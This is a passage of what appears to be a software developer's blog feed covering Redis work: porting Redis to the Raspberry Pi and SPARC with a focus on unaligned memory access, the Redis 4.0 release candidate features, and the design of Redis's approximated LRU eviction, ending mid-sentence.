The way simplicity can be achieved is to reason in terms of small mental “proofs of concept”, so that a large number of simple designs can be explored in the mind of the programmer, in order to start working from the one that looks like the most viable and direct solution. Later, experience and personal design abilities will allow the programmer to improve the design and find sensible solutions for the sub-designs that need to be resolved.

However, each time a complex solution is needed, it’s important to reason for a long time about how the complexity can be avoided, and to only continue in that direction if no better possibility is found, even after considering completely different alternatives.

* Perfectionism, or how to kill your productivity and bias your designs

Perfectionism comes in two variants: as an engineering culture of reaching the best possible measurable performance in a program, and as a personality trait. In both instances, I see this as one of the biggest barriers for a programmer to deliver things fast. Perfectionism and fear of external judgment insert a design bias that results in poor choices, refining a design only according to psychological or trivially measurable parameters, while things like robustness, simplicity, and the ability to deliver in time are often not accounted for at all.

* Knowledge: some theory is going to help

When dealing with complex tasks, knowledge of data structures, of the fundamental limits of computation, and of non trivial algorithms that are very suitable for modeling certain tasks, is going to have an impact on the ability to find a suitable design. It is not required to be a super expert of everything, but it certainly is required to be at least aware of a multitude of potential solutions for a problem. For instance, applying design sacrifice (accepting some error percentage) and being aware of probabilistic set cardinality estimators can be combined in order to avoid a complex, slow and memory inefficient solution for counting unique items in a stream.

* Low level: understanding the machine

A number of issues in programs, even when using high level languages, arise from misunderstanding how the computer is going to perform a given task. This may even lead to the need to re-design and re-implement a project from scratch, because there is a fundamental problem in the tools or algorithms used. Good competence in C, an understanding of how CPUs work, and clear ideas about how the kernel operates and how system calls are implemented, can save you from bad late-stage surprises.

* Debugging skills

It is very easy to spend an enormous amount of work finding bugs. The combination of being good at incrementally gaining state about a bug, in order to fix it with a rational set of steps, and the attitude of writing simple code that is unlikely to contain too many bugs, can have a great effect on programmer efficiency.

It is not surprising to me that the above qualities of a programmer can have a 10x impact on the output. Combined, they allow for good implementations of designs that start from a viable model and can be several times simpler than the alternatives. There is a way to stress simplicity that I like to call “opportunistic programming”: basically, at every development step, the set of features to implement is chosen in order to have the maximum impact on the user base of the program, with the minimum requirement of effort.
Redis on the Raspberry Pi: adventures in unaligned lands http://antirez.com/news/111 http://antirez.com/news/111 Fri, 24 Feb 2017 09:52:30 +0000
Well, I love to think that Redis too is a platform that programmers like to use when they hack, experiment, build new things. Moreover devices that can be used for embedded / IoT applications often have the problem of temporarily or permanently storing, on the device, data received for example from sensors, in order to perform on-device computations or to send the data to remote servers. Redis is adding a “stream” data type that is specifically suited for streams of data and time series storage; at this point the specification is near complete and the work to implement it will start in the next weeks. The existing Redis data structures, and the new streams, together with the small memory footprint and the decent performance it can provide even while running on small hardware (with resulting low energy usage), looked like a good match for potential Raspberry Pi applications, and in general for small ARM devices. The missing piece was the obvious one: to run well on the Pi.

One of the many cool things about the Pi is that its development environment does not look like the embedded development environments of a few years ago… It just runs Linux, with all the Debian-like tooling you expect to find. Basically, adapting Redis to work on the Pi was not a huge task. The most fundamental mismatch a Linux system program could have with the Pi is a performance / footprint mismatch, but this is a non issue because of the Redis design itself: an empty instance consumes a total of 1MB of Resident Set Size, it serves queries from memory, so it is fast enough and does not stress the flash storage too much, and when persistence is needed, it uses AOF, which has an append-only write pattern. However the Pi runs an ARM processor, and this requires some care when dealing with unaligned accesses.

In this blog post, while showing you what I did to make Redis and the Raspberry Pi happier together, I’ll try to provide an overview of dealing with architectures that do not handle unaligned accesses as transparently as the x86 platform does.

A few things about ARM processors
===

The most interesting thing about porting Redis to ARM is that ARM processors are, or actually were… well, not big fans of unaligned memory accesses. If you live your life in high level programming, you may not know it, but many processor architectures were historically not able to load or store memory words at addresses that are not multiples of the word size. So if the word size is 4 bytes (in the case of a 32 bit processor), you may load or store a word at address 0x4, 0x8, and so forth, but not at address 0x7. The result is sometimes an exception, sometimes an odd behavior, depending on the CPU and its exact configuration.

Then the x86 processor family ruled the world and everybody kinda forgot about this issue (except when dealing with SSE instructions and the like, but now even those instructions have unaligned variants). Oh well, initially forgetting about the issue is not really what happened. Even if x86 processors could deal with unaligned accesses without raising an exception, doing so carried a non trivial performance penalty: partial reads/writes at word boundaries required double the work. But recent x86 processors have optimizations that make unaligned accesses as fast as aligned accesses most of the time, so basically nowadays for x86 this is really Not An Issue.

ARM was, up to ARMv5, one of those platforms where unaligned accesses caused strange, and very unexpected, results. From the ARM official documentation: “if the address is not a multiple of four, the LDR instruction returns a rotated result rather than performing a true unaligned word load. Generally, this rotation is not what the programmer expects.” Oh well, *definitely* not what the programmer expects. However even the original Raspberry Pi had an ARMv6 processor. The v6, while incurring a performance penalty, is able to deal with word-sized unaligned accesses. However instructions that deal with multiple words will raise an exception, terminating the program with a SIGBUS signal, or asking the kernel for help (as we’ll see later in more detail). This means that Redis would not crash like crap immediately when running on the Pi, because most of the unaligned accesses performed by Redis were actually word-sized. However, from time to time, the compiler generated code to speed up the computation using multiple load/store instructions, or the Redis code itself tried to load/store 64 bit values at unaligned addresses. This would normally result in a crash, in theory; however Linux helps a bit in this regard.

Instead of crashing, ask the kernel!
===

The Linux kernel, when running on an ARM processor, is able to help user processes work as expected even when they execute operations on unaligned addresses that are normally not supported by the CPU. The way this is performed is by registering a handler inside the kernel for such exceptions: the kernel will check the operation that failed, and will simulate it in a function, so that the final result is as if the processor executed it, and then will resume the “offending” process, which will continue to run.

If you are into low level programming, this Linux kernel file is worth checking: http://lxr.free-electrons.com/source/arch/arm/mm/alignment.c

The actual behavior of the kernel when an unaligned access exception is raised by the CPU is controlled by the file /proc/cpu/alignment:

$ cat /proc/cpu/alignment
User: 0
System: 12590 (ip6_datagram_recv_common_ctl+0xc8/0xd4 [ipv6])
Skipped: 0
Half: 0
Word: 0
DWord: 0
Multi: 12590
User faults: 2 (fixup)

As you can see there are separate counters for all the unaligned accesses that were corrected by the kernel, both in user space and in kernel space. In the above case 12590 accesses were corrected in kernel space. No user land process was corrected. Note that the “User faults” line shows the kernel configuration about what to do when a user space process performs an unaligned access that the CPU cannot handle: it can fix the problem, send a SIGBUS, or log the event in the kernel logs. This is controlled by single bits of an integer that can be written into /proc/cpu/alignment, so for instance in order to log (other than fix) user space unaligned accesses one can use “echo 3 > /proc/cpu/alignment” (bit 1 enables logging, bit 2 enables fixing).

My feeling is that the Linux kernel implemented such a feature not so much because the kernel developers were concerned about the poor user space programmers unable to deal with unaligned memory accesses, but because the kernel itself does not always perform aligned accesses, as you can see from the “System” counter. So this was the simplest way to fix the Linux port on ARM, instead of checking every single place in the code.

Given that Linux handles this transparently, one could be tempted to say, oh well… maybe there is nothing to fix here, Redis will just work as expected as long as we set /proc/cpu/alignment to fix things transparently. Actually this is not the case for two reasons:

1. When an unaligned access is performed and fixed by the kernel, this results in *very* slow execution. The speed penalty is much larger than, for example, the second memory access needed when doing unaligned word-sized accesses. While this only happens with multiple load and store instructions, it is still a shame that in certain conditions Redis would be much slower than needed.

2. The Linux kernel implementation of ARM misaligned accesses is not perfect. There is code that GCC will emit that contains instructions that are not handled well by Linux 4.4.34.

A trivial example is this one:

#include <stdlib.h>

int main(int argc, char **argv) {
    int count = 1000;
    char *buf = malloc(count*sizeof(double)+1);
    double sum = 0;
    double *l = (double*) (buf+1); /* Purposely misaligned pointer. */
    while(count--) {
        sum += *l;
        l++;
    }
    return 0;
}

$ gcc foo.c -g -ggdb
$ ./a.out
Bus error

Even though the kernel configuration on my Pi is set to deal with unaligned accesses and fix them, the program still received a SIGBUS!
Let’s see where this happens with GDB:

$ gdb ./a.out
(gdb) run

Program received signal SIGBUS, Bus error.
0x00010484 in main (argc=1, argv=0xbefff3b4) at foo.c:10
10 sum += *l;

Well, it’s in the inner loop, when our non aligned double pointer is dereferenced, as expected.
But we may want to check further what’s happening, looking at the ARM instruction that generated the exception:

(gdb) x/i $pc
=> 0x10484 : vldr d6, [r11, #-20] ; 0xffffffec

The VLDR instruction loads an extension register from a memory location, and is used for floating point math. For some reason the Linux kernel implementation of unaligned access correction is not able to handle this instruction (I guess the implementation is just not as complete as it should be). The “dmesg” command will indeed show that the instruction was not recognized by the function that fixes the unaligned accesses:

[317778.925569] Alignment trap: not handling instruction ed937b00 at [<00010480>]
[317778.925610] Unhandled fault: alignment exception (0x011) at 0x01cb8011

So, if the default C compiler on the Pi can emit code that the default Linux kernel cannot handle, I really wanted Redis to be able to run without issues even when the kernel is configured not to fix unaligned accesses. This means that Redis on ARM should only perform word-sized unaligned accesses, the only ones that the CPU can handle transparently.

Fixing the bugs
===

Given that ARM deals well with most unaligned memory accesses, Redis appeared to be already working on the Pi, mostly, especially since by default the kernel is configured to fix many of the unaligned accesses that are not supported. Even with the alignment fixing disabled, it still superficially worked. However running the tests revealed different crashes, especially in obvious areas like bit operations and hash functions.

The first thing Redis now does is to define USE_ALIGNED_ACCESS when compiled on architectures that don’t support unaligned accesses. Then it was just a matter of fixing the code in order to avoid the fast paths where unaligned accesses were performed, or replacing the pointer dereferences with memcpy() operations. You may think that using memcpy() is way slower than dereferencing a pointer, but things are much better than that: for a fixed size memcpy() call like memcpy(dst,src,sizeof(uint64_t)) the compiler is smart enough to avoid calling the function. It will actually generate the fastest set of instructions that will do the trick even if the address is not aligned. For instance, on x86 processors, this function call will actually be translated into a single MOV instruction.
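The pattern looks like this (a minimal sketch of the idea, not the actual Redis helper):

#include <stdint.h>
#include <string.h>

/* Load a 64 bit value from a potentially unaligned address. The
 * fixed-size memcpy() is inlined by the compiler into the best load
 * sequence for the target CPU: a single MOV on x86, byte or word
 * loads as needed on stricter architectures. */
static inline uint64_t load_u64(const void *p) {
    uint64_t v;
    memcpy(&v, p, sizeof(v));
    return v;
}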

After those fixes, Redis and my two Raspberries, one original model B and a much faster Pi 3, started to be great friends: all tests passing, except one about generating call traces in crash reports (but I’m going to fix this one as well), and, from time to time, a few failures in the integration tests due to the slowness of the Pi in setting up masters and slaves. However at this point my appetite for correctness was stimulated: I wanted some more alignment problems.

Let’s go the extra mile: SPARC
===

While I was working on fixing Redis for ARM, there was a parallel issue open in the GitHub repository about making Redis run well on Solaris/SPARC. Now SPARC is not as gentle as ARM: it is not able to deal with *any* unaligned access. I remember this very well since, during my first years of C programming, I bought a very old SPARCstation 4: big endian and, at the same time, unable to deal with unaligned accesses of any kind, it gave me some perspective on porting programs around. It’s a shame that after a few months of having it I spilled vodka on it, frying the motherboard forever, but I still have it in my parents’ house.

The way Solaris/SPARC deals with unaligned accesses is more complex than Linux/ARM: 32 bit unaligned accesses are always fixed by the kernel, while 64 bit unaligned accesses are handled by registering a user space trap, according to the compilation flags. The Sun Studio C compiler has specific options to control what happens in a very precise way, and even tools to easily detect and fix such unaligned accesses.

While non-word-sized unaligned accesses were rare in Redis, you could expect word-sized unaligned accesses to be everywhere. But actually that was not the case, since up to Redis 3.0 I used to test and fix Redis on an OpenBSD/SPARC box from time to time. So the biggest problem was the function used to hash keys. The original Redis string library, called SDS, had a fixed size header, so accesses were always aligned while hashing keys. Starting with Redis 3.2 the SDS header is variable in size, so this is no longer the case. Moreover there were other new unaligned accesses accumulated here and there since the last time I tested Redis on SPARC, a few years ago.

To fix the hash function I also switched to SipHash, so this is also a security fix against HashDoS attacks. However it’s worth noting that I’m currently using a SipHash variant with a reduced number of C and D rounds: SipHash-1-2. This was done in order to avoid an otherwise non trivial speed regression; however there should be no practical attacks against SipHash-1-2 AFAIK, and it is anyway surely more secure than what we previously used, MurmurHash2, which is so weak in that regard that it’s possible to generate seed-independent collisions.

The SipHash implementation I’m using is the reference one, modified a bit in order to simplify the code and to have a case insensitive variant.
It is designed to deal with unaligned accesses, and to be endian agnostic. Perhaps the first time I’ve seen a reference implementation of a hash function written so well…

The other SPARC fixes were greatly simplified by a kind Redis user that provided me with access to a Solaris/SPARC box. In the process of fixing the unaligned accesses I also tried to fix building and testing Redis on Solaris/SPARC, so this was a good portability improvement exercise in general. After this task was completed, Redis is finally “alignment safe”, at least for the stand alone code. There is more work to do in the Cluster area.

Performance of Redis on the Raspberry Pi
===

Ok, back to the Pi :-) How fast does Redis run on such small hardware? Well, as there is more than one Pi model out there, there are multiple answers to this question. Redis on the Pi 3 is surprisingly fast. My benchmarks are performed via the loopback interface, because Redis on the Pi will mostly be used by local programs writing data to it, or using it as a message bus for both IPC and cloud-edge exchange of information (by cloud here I mean the central servers of an appliance, and by edge the local installation of an appliance). However it also runs well when accessed via the ethernet port.

On the Pi 3, I get these numbers:

Test 1: 5 million writes with 1 million keys (even distribution among keys). No persistence, no pipelining: 28000 ops/sec.
Test 2: Like test 1, but with pipelining using groups of 8 operations: 80000 ops/sec.
Test 3: Like test 1, but with AOF enabled, fsync every second: 23000 ops/sec.
Test 4: Like test 3, but with an AOF rewrite in progress: 21000 ops/sec.
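For reference, a workload like Test 2 can be simulated with the bundled redis-benchmark tool; a plausible invocation (an assumption on my side, not the exact command used for the numbers above) is:

redis-benchmark -t set -n 5000000 -r 1000000 -P 8 -q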

Basically Redis on the Pi 3 looks fast enough for most use cases. Consider that Redis is mostly single threaded, or double-threaded when it rewrites the AOF log (since there is another background process), so you can expect the above performance while, at the same time, other processes are running on the Pi. The bottom line is: these numbers do not mean we are saturating the Pi.

With the original model B things are *quite* different: the numbers are much lower, like 2000 ops/sec non pipelined, and 15000 ops/sec when pipelining is used. This huge gap seems to hint at very inefficient handling of syscalls like write and read, which require a context switch. However those are still good enough numbers for most applications, since Redis is not going to serve external clients most of the time, and because when high-load data logging is needed, pipelining is often simple to implement.

However right now I don’t have one of the most interesting devices to test (other than the Pi 3), which is the Pi Zero. It will be interesting to see the numbers it can deliver. They should be better than those of the model B I’m using.

Pi continuity
===

One thing I love about Redis running well on the Pi is that I’m excited about the Raspberry Pi becoming, with things like the Pi Zero, potentially the go-to platform for IoT products. I mean even finished products intended for the final user. I can’t stop thinking about what I would like to do in the hardware space if I had time: sensors, displays, the GPIO port, and the very low price make it possible to build a hardware startup in a much simpler way compared to the past, and I love the idea that hackers around the world could now ship smart appliances of different kinds. I want to be somewhat part of this, even if marginally, by providing a good Redis experience on the Pi (and in the future on Android and other ARM based systems). Redis has a good combination of low resource needs, append-only operations, and a data model suitable for both logging and in-device analysis of the data, in order to take actions based on historical events, so I really believe it can help in this space.

So starting from now the Raspberry Pi is for me one of the main target platforms for Redis, like the Linux servers originally were set as the Redis “standard”. In the next weeks I’ll continue with the fixes, which will all go into Redis 4.0. At the same time I’ll write a new section in the Redis official site with all the information about Redis and the Pi: benchmarks on the different devices, good practices, and so forth.
Maybe in the future I’ll also be able to release proof of concept “agents” that use Redis as a data bus between IoT devices and the cloud, allowing the device to just log data inside Redis, with the agent taking care of moving the data to the cloud when the link with the outside world works, and at the same time fetching commands for the device to execute and sending back replies. This will be even more interesting when the stream data structure becomes available in Redis 4.2.

I would love to hear about applications where you see Redis helping in embedded setups, and about what I could do to make it better in this regard.
The first release candidate of Redis 4.0 is out http://antirez.com/news/110 http://antirez.com/news/110 Fri, 02 Dec 2016 17:25:58 +0000
It’s just that Redis 4.0 has a lot of things that Redis should have had since ages, in a different world where one developer could, like Ken the Warrior, duplicate himself in ten copies and start to code. But no matter how hard I try to learn about new vim shortcuts, the duplicate-me thing is still not in my chords.

But well, finally with 4.0 we got a lot of this stuff done… and here is the list of the big ones, with a few details and pointers to learn more.

1. Modules

As you probably already know, Redis 4.0 got a modules system, one that allows you to do pretty fancy stuff like implementing new data types that are RDB/AOF persisted, creating non blocking commands, and so forth. The deal here is that all this is done with a higher level abstract API completely separated from the core, so the modules you write are going to work with new releases of Redis. Using modules I wrote Neural Redis, a neural network data type that can be trained inside Redis itself, and many people are doing very interesting stuff: there are new rate limiting commands (implemented in Rust!), graph DBs on top of Redis, secondary indexes, time series modules, full text indexing, and a number of other things, and my feeling is that it’s just the start.

This does not just allow Redis to grow and cover new things, while keeping the core, if not minimal, at least limited to pretty generic things that are useful to most users. It also has the potential to avoid, for many tasks, the problem of rewriting a networked server from scratch, even if the goal is to create something not related to Redis, databases, caching, or whatever Redis is. That is, you can just write a module to reuse the Redis “infrastructure”: the protocol, the clients people already wrote, and so forth. So I have a good feeling about it: no pressure on the core, freedom for the users that want to do more crazy stuff.

2. Replication version 2

So, that’s going to be very useful in production from the point of view of operations. At some point in the past we introduced what is known as “PSYNC”. It was a new master-slave protocol that allowed the master and the slave to continue from where they were if the connection between the two broke. Before that, every single connection break in the replication link between master and slave resulted in a full synchronization: generate an RDB file on the master, transfer it, load it on the slave… ok, you know how this works. So PSYNC was a real improvement. But not enough…

PSYNC was not good enough when there was a failover. If a slave is promoted to master, the slaves that replicated from the old master were not able to connect to the newly promoted slave and PSYNC with it: a full resynchronization was needed. This is not great, and is not good for Redis Cluster either. However fixing this required changes to the replication protocol, because I really wanted to make sure that partial resyncs were going to work after any possible topology change, as long as there was a common replication history among the instances.

So the first change needed was about how “chained replication” works, that is, slaves of slaves of slaves… How do they work? Like, A is the master, and we have something like this:

A —> B —> C —> D

So A is the master of B, but B is the master of C and so forth. Before Redis 4.0, B received the replication protocol from A. The replication protocol is, normally, a stream of write commands. B acted as a master for C by doing, internally, what A was doing: for every write it generated again a suitable replication protocol to pass to C, and so forth.

Now instead B just proxies, verbatim, what it receives from A to C, and C does the same for D: given that all the sub-slaves now receive an identical stream of bytes, they can “tag” a given history, and use the tag and the offset to try to continue whenever they have something in common.

The master itself, when it is turned into a slave, is now able to PSYNC with the new master. And slaves can usually PSYNC with the master even after a “clean” restart, using the info inside the RDB file, that now stores the replication tags and offsets.

Details are more complex than that, in order to make it work well, but the deal here is: don’t get annoyed by full resynchronizations if possible. And PSYNC v2 apparently does this well. Please try it and let me know if you are interested in this feature.

3. Cache eviction improvements

Ok, about that I wrote a full article months ago: http://antirez.com/news/109. So I’m going to give you just the TLDR. We now have LFU (Least Frequently Used), and all the other policies switched to a more robust, fast and precise implementation. So big news for caching use cases. Read the full article if you care about this stuff, there are tons of infos.

4. Non blocking DEL and FLUSHALL/FLUSHDB.

Code name: “lazy freeing of objects”, but it’s a lame name for a neat feature. There is a new command called UNLINK that just removes the key reference from the database, and performs the actual clean up of the allocations in a separate thread, so if you use UNLINK instead of DEL against a huge key the server will not block. And even better, with the ASYNC option of FLUSHALL and FLUSHDB you can do that for whole DBs or for all the data inside the instance, if you want. Combined with the new SWAPDB command, which swaps the content of two Redis databases, FLUSHDB ASYNC can be quite interesting. Once you have, for instance, populated DB 1 with the new version of the data, you can SWAPDB 0 1 and FLUSHDB ASYNC the database with the old data, then create yet a newer version and reiterate. This is only possible now because flushing a whole DB is no longer blocking.
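A minimal sketch of that pattern from redis-cli, assuming the new dataset was just written into DB 1 while clients read from DB 0:

> SWAPDB 0 1
OK
> SELECT 1
OK
> FLUSHDB ASYNC
OK

After the swap, clients of DB 0 immediately see the new data, while the old dataset, now living in DB 1, is reclaimed by a background thread.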

There are reasons why UNLINK is not the default for DEL. I know things… I can’t talk (**).

5. Mixed RDB-AOF persistence format.

Optionally, if you enable it, AOF rewrites are now performed by prefixing the AOF file with an RDB preamble, which is both faster to generate and to load. This is going to be very useful in certain environments, but makes the AOF file a less transparent file, so it’s optional for now. This feature was talked about for ages and finally it’s “in”.

6. The new MEMORY command.

I love it, as much as I loved LATENCY DOCTOR, which, once introduced, cut the percentage of “My Redis is slow” complaints in the mailing list to a minor fraction. Now we have it for memory issues as well.

127.0.0.1:6379> MEMORY DOCTOR
Hi Sam, this instance is empty or is using very little memory, my issues detector can't be used in these conditions. Please, leave for your mission on Earth and fill it with some data. The new Sam and I will be back to our programming as soon as I finished rebooting.

Movie rights owners will probably sue me for taking inspiration from sci-fi dialogues, but that’s fine. Bring oranges for me when I’ll be in jail.

MEMORY does a lot more than that.

127.0.0.1:6379> MEMORY HELP
1) "MEMORY USAGE [SAMPLES ] - Estimate memory usage of key"
2) "MEMORY STATS - Show memory usage details"
3) "MEMORY PURGE - Ask the allocator to release memory"
4) "MEMORY MALLOC-STATS - Show allocator internal stats"

The memory usage reporting of the USAGE subcommand is going to be very useful, but so is the in-depth information provided by “STATS”.

For now all this is totally not documented, so have fun figuring out what the heck it does.

7. Redis Cluster is now NAT / Docker compatible.

But this is actually bad news too, because the binary protocol changed in the “Cluster bus” nodes use to communicate, so to upgrade to 4.0 you need a mass restart of a Redis Cluster. I’m sorry, I was tricked into these NAT / Docker fixes, pardon me. I tried to make it backward compatible, but there was no way to obtain this easily, or even non easily, without doing totally awkward stuff.

The feature is explained in the example redis.conf file. You can see how I’m a bit less excited about this feature compared to the other ones, can’t you?

Well… that’s it, I guess, those are the major things. If you want, also read the release notes here: https://raw.githubusercontent.com/antirez/redis/4.0/00-RELEASENOTES

The ETA to get it stable is, as usual, unknown: I plan to release a new RC every 2-4 weeks, more or less. When bugs slow down significantly, both from the point of view of severity and frequency of reporting, it will be Redis 4.0-final time. However there is a lot of documentation to update as well, so I’ll have plenty of things to do.

Many thanks to all the people that contributed to this release: many did in significant ways. In the release notes above there is the list of all the commits, which you can scan in order to see the names of the committers.

Thanks to the Redis community and Redis Labs for making all this possible, but especially thanks to all the developers that use Redis and apply it well to everyday problems to get shit done, because this is the whole point, other than having fun while coding.

P.s. the fastest way to grab the new code is to fetch the '4.0' branch from GitHub. The repository is, as usual, antirez/redis.

** Check https://news.ycombinator.com/item?id=13091370 for more info about UNLINK not being the default behavior for DEL.
Random notes on improving the Redis LRU algorithm http://antirez.com/news/109 http://antirez.com/news/109 Fri, 29 Jul 2016 08:04:12 +0000
In other terms, every cache has a hit/miss ratio, which is, in qualitative terms, just the percentage of read queries that the cache is able to serve. Accesses to the keys of a cache are not evenly distributed among the data set in most workloads. Often a small percentage of keys get a very large percentage of all the accesses. Moreover the access pattern often changes over time, which means that as time passes certain keys that were very requested may no longer be accessed often, and conversely, keys that once were not popular may turn into the most accessed keys.

So in general what a cache should try to do is to retain the keys that have the highest probability of being accessed in the future. From the point of view of an eviction policy (the policy used to make space to allow new data to enter) this translates into the contrary: the key with the least probability of being accessed in the future should be removed from the data set. There is only one problem: Redis and other caches are not able to predict the future.

The LRU algorithm
===

While caches can’t predict the future, they can reason in the following way: keys that are likely to be requested again are keys that were recently requested often. Since access patterns usually don’t change very suddenly, this is an effective strategy. However the notion of “recently requested often” is more insidious than it may look at first glance (we’ll return shortly to this). So this concept is simplified into an algorithm called LRU, which instead just tracks the *last time* a key was requested. Keys that are accessed with a higher frequency have a greater probability of being idle (not accessed) for a shorter time compared to keys that are rarely accessed.

For instance this is a representation of the accesses of four different keys over time. Each “~” character is one second, while the “|” line at the end is the current instant.

~~~~~A~~~~~A~~~~~A~~~~A~~~~~A~~~~~A~~|
~~B~~B~~B~~B~~B~~B~~B~~B~~B~~B~~B~~B~|
~~~~~~~~~~C~~~~~~~~~C~~~~~~~~~C~~~~~~|
~~~~~D~~~~~~~~~~D~~~~~~~~~D~~~~~~~~~D|

Key A is accessed once every 5 seconds, key B once every 2 seconds,
and keys C and D are both accessed every 10 seconds.

Given the high frequency of accesses of key B, it has among the lowest idle
times, which means its last access time is the second most recent among all the
four keys.

Similarly, the idle times of A and C, 2 and 6 seconds, reflect well
the access frequency of both those keys. However as you can see this
trick does not always work: key D is accessed every 10 seconds, yet
it has the most recent access time of all the keys.

Still, in the long run, this algorithm works well enough. Usually keys
with a greater access frequency have a smaller idle time. The LRU
algorithm evicts the Least Recently Used key, which means the one with
the greatest idle time. It is simple to implement because all we need to
do is to track the last time a given key was accessed, or sometimes
this is not even needed: we may just have all the objects we want to
evict linked in a linked list. When an object is accessed we move it
to the top of the list. When we want to evict objects, we evict from
the tail of the list. Tada! Win.
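
For reference, the textbook linked list version could be sketched in C like this (just a conceptual illustration, not Redis code: as we'll see shortly, Redis cannot afford the two pointers per object that this approach requires):

/* A sketch of textbook LRU with an intrusive doubly linked list.
 * On access, an item moves to the head; eviction takes the tail. */
typedef struct lruItem {
    struct lruItem *prev, *next;
    /* ... the cached object itself ... */
} lruItem;

typedef struct lruList {
    lruItem *head, *tail;
} lruList;

/* Called on every access: unlink the item, relink it at the head. */
void lruTouch(lruList *l, lruItem *i) {
    if (l->head == i) return;
    if (i->prev) i->prev->next = i->next;
    if (i->next) i->next->prev = i->prev;
    if (l->tail == i) l->tail = i->prev;
    i->prev = NULL;
    i->next = l->head;
    if (l->head) l->head->prev = i;
    l->head = i;
    if (l->tail == NULL) l->tail = i;
}

/* Called to make space: remove and return the LRU item at the tail. */
lruItem *lruEvict(lruList *l) {
    lruItem *i = l->tail;
    if (i == NULL) return NULL;
    l->tail = i->prev;
    if (l->tail) l->tail->next = NULL;
    else l->head = NULL;
    return i;
}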

LRU in Redis: the genesis
===

Initially Redis had no support for LRU eviction. It was added later, when memory efficiency was a big concern. By modifying the Redis Object structure a bit, I was able to free 24 bits of space. There was no room for linking the objects in a linked list (fat pointers!); moreover the implementation needed to be efficient, since the server performance should not drop too much because of the selection of the key to evict.

The 24 bits in the object are enough to store the least significant
bits of the current unix time in seconds. This representation, called
“LRU clock” inside the source code of Redis, takes 194 days to overflow. Key metadata is updated much more often than that, so this was good enough.
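
Conceptually it is something like the following sketch (a simplification: the actual Redis code differs in resolution and details):

#include <time.h>

#define LRU_BITS 24
#define LRU_CLOCK_MAX ((1<<LRU_BITS)-1)

/* The "LRU clock": unix time in seconds, truncated to 24 bits.
 * It wraps around every 2^24 seconds, that is about 194 days. */
unsigned int getLRUClock(void) {
    return (unsigned int)time(NULL) & LRU_CLOCK_MAX;
}

/* Estimated idle time of an object, handling the wrap around. */
unsigned long estimateObjectIdleTime(unsigned int obj_lru) {
    unsigned int now = getLRUClock();
    if (now >= obj_lru) return now - obj_lru;
    return (LRU_CLOCK_MAX - obj_lru) + now;
}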

However there was another, more complex, problem to solve: how to
select the key with the greatest idle time in order to evict it? The
Redis key space is represented via a flat hash table. Adding another
data structure to hold this metadata was not an option; however, since
LRU is itself an approximation of what we want to achieve, what
about approximating LRU itself?

The initial Redis algorithm was as simple as this: when a key must be
evicted, select 3 random keys, and evict the one with the highest
idle time. Basically we do random sampling over the key space and
evict the key that happens to be the best candidate. Later this
“3 random keys” was turned into a configurable “N random keys”, and
the algorithm speed was improved so that the default could be raised
to 5 sampled keys without losing performance. Considering how naive
it was, it worked well, very well actually. If you think about it,
you almost never make the best decision with this algorithm, but you
are very unlikely to make a very bad decision either. If there is a
subset of very frequently accessed keys in the data set, out of 5
keys it is hard to be so unlucky as to only sample keys with a very
short idle time.
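
Conceptually, the sampling step looks like this (just a sketch: randomKey() and idleTime() are placeholders for the real key space primitive and for the idle time estimation sketched before):

/* Minimal stand-in for the real Redis object, just for the sketch. */
typedef struct robj { unsigned int lru; /* ... */ } robj;

robj *randomKey(void);           /* Placeholder: a random key. */
unsigned long idleTime(robj *o); /* Placeholder: estimated idle time. */

/* Sample 'samples' random keys and return the one with the
 * greatest idle time: that's the eviction candidate. */
robj *evictionCandidate(int samples) {
    robj *best = NULL;
    unsigned long best_idle = 0;
    for (int j = 0; j < samples; j++) {
        robj *o = randomKey();
        unsigned long idle = idleTime(o);
        if (best == NULL || idle > best_idle) {
            best = o;
            best_idle = idle;
        }
    }
    return best;
}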

However if you think about this algorithm *across* its executions,
you can see how we are trashing a lot of interesting data. Maybe when
sampling the N keys we encounter a lot of good candidates, but we
then just evict the best and start from scratch again in the next
cycle.

First rule of Fight Club is: observe your algorithms with naked eyes
===

At some point I was in the middle of working on the upcoming Redis
3.0 release. Redis 2.8 was actively used as an LRU cache in multiple
environments, and people didn’t complain too much about the
precision of the eviction in Redis, but it was clear that it could
be improved, even without using a noticeable amount of additional CPU
time, and without a single bit of additional space.

However in order to improve something, you have to look at it. There
are different ways to look at LRU algorithms. You can write, for example,
tools that simulate different workloads, and check the hit/miss ratio
at the end. This is what I did, however the hit/miss ratio depends
a lot on the access pattern, so in addition to this information I
wrote a utility that displayed the algorithm quality in a
visual way.

The program was very simple: it added a given number of keys, then
accessed the keys sequentially so that each had a decreasing
idle time. Finally 50% more keys were added (the green ones in the
picture), so that half of the old keys needed to be evicted.

In a perfect LRU implementation, none of the newly added keys is evicted, while the oldest 50% of the old dataset is evicted.

This is the representation produced by the program for different
versions of Redis and different settings:

http://redis.io/images/redisdoc/lru_comparison.png

When looking at the graph remember that the implementation we
discussed so far is the one of Redis 2.8. The improvement you
see in Redis 3.0 is explained in the next section.

LRU V2: don’t trash away important information
===

With the new visual tool, I was able to try new approaches and
test them in a matter of minutes. The most obvious way to improve
the vanilla algorithm used by Redis was to accumulate the otherwise
trashed information in a “pool” of good candidates for eviction.

Basically when the sampling of N keys was performed, it was used to
populate a larger pool of keys (just 16 keys by default).
This pool keeps the keys sorted by idle time, so new keys only enter
the pool when they have an idle time greater than at least one key
already in the pool, or when there is empty space in the pool.
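
In code, the pool insertion could be sketched like this (again just a conceptual sketch of the idea, not the actual Redis implementation):

#include <string.h> /* memmove() */

#define POOL_SIZE 16

struct poolEntry {
    unsigned long idle; /* Estimated idle time of the key. */
    void *key;          /* The key itself. */
};

/* Slots 0..pool_used-1 are filled, sorted by ascending idle time. */
static struct poolEntry pool[POOL_SIZE];
static int pool_used = 0;

/* A sampled key enters the pool only if there is free space, or if
 * its idle time beats the smallest one in the pool: in that case
 * the entry with the smallest idle time is dropped. */
void poolInsert(void *key, unsigned long idle) {
    int j;
    if (pool_used == POOL_SIZE) {
        if (idle <= pool[0].idle) return; /* Not a good candidate. */
        /* Drop pool[0], shifting the other entries to the left. */
        memmove(pool, pool+1, sizeof(pool[0])*(POOL_SIZE-1));
        pool_used--;
    }
    /* Insertion sort step: find the position, shift to the right. */
    for (j = pool_used; j > 0 && pool[j-1].idle > idle; j--)
        pool[j] = pool[j-1];
    pool[j].key = key;
    pool[j].idle = idle;
    pool_used++;
}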

This small change improved the performance of the algorithm
dramatically, as you can see in the image I linked above, and
the implementation was not so complex. A couple of memmove() calls
here and there and a few profiling efforts, but I don’t remember
major bugs in this area.

At the same time, a new redis-cli mode to test the LRU precision
was added (see the --lru-test option), so I had another way to
check the performance of the LRU code with a power-law access
